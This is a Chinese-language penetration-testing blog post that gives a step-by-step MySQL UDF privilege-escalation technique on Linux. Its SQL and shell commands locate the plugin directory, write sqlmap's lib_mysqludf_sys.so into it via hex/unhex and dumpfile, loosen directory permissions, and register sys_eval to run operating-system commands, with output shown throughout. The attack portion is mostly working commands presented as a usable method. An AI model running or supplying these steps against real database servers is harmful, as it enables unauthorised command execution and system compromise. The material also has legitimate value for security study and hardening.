Linux UDF Mysql提权

CracerCracer 2015-12-21 渗透测试 1,965 0 6
环境:
os:linux(bt5)
database:mysql
 
简述:
通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。
要求:
在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;
 
过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令
1,得到插件库路径
1
show variables like "%plugin%";

回显:如下 

1
2
3
4
5
+---------------+-----------------------+
| Variable_name | Value |
+---------------+-----------------------+
| plugin_dir | /usr/lib/mysql/plugin |
+---------------+-----------------------+

1 row in set (0.00 sec)

2,找对应操作系统的udf库文件
因为自己测试,看了下自己系统的版本,64位
1
2
root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可

1
2
3
4
5
6
root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
32 64
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so
3,利用udf库文件加载函数并执行命令
首先要得到udf库文件的十六进制格式,可在本地通过
1
2
select hex(load_file(‘/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so’)) into outfile ‘/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)

因为我测试时,使用自带账户,账户名mysql,并不是root,所以插件目录不可写,而实际中,一般udf提权都是用root权限启动的mysql程序,故,不存在目录权限不足,不能访问的情况。为了继续,修改目录权限

1
root@bt:~# chmod 777 /usr/lib/mysql/plugin

数据库中写入udf库到mysql库目录:

1
2
select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)

查看下这个udf库所支持的函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
w _Jv_RegisterClasses
0000000000201788 A __bss_start
w __cxa_finalize
w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
U fgets
U fork
U free
U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
U malloc
U mmap
U pclose
U popen
U realloc
U setenv
U strcpy
U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
U sysconf
U system
U waitpid
U system
U waitpid

最后,加载函数并执行:

1
create function sys_eval returns string soname "mysqludf.so";

Query OK, 0 rows affected (0.14 sec)
select sys_eval('whoami');

+--------------------+

| sys_eval('whoami') |

+--------------------+

| mysql |

+--------------------+

1 row in set (0.04 sec)
select * from mysql.func;

+----------+-----+-------------+----------+

| name | ret | dl | type |

+----------+-----+-------------+----------+

| sys_eval | 0 | mysqludf.so | function |

+----------+-----+-------------+----------+

1 row in set

转载请注明来自Cracer,本文标题:《Linux UDF Mysql提权》

喜欢 (6) 发布评论
发表评论


Top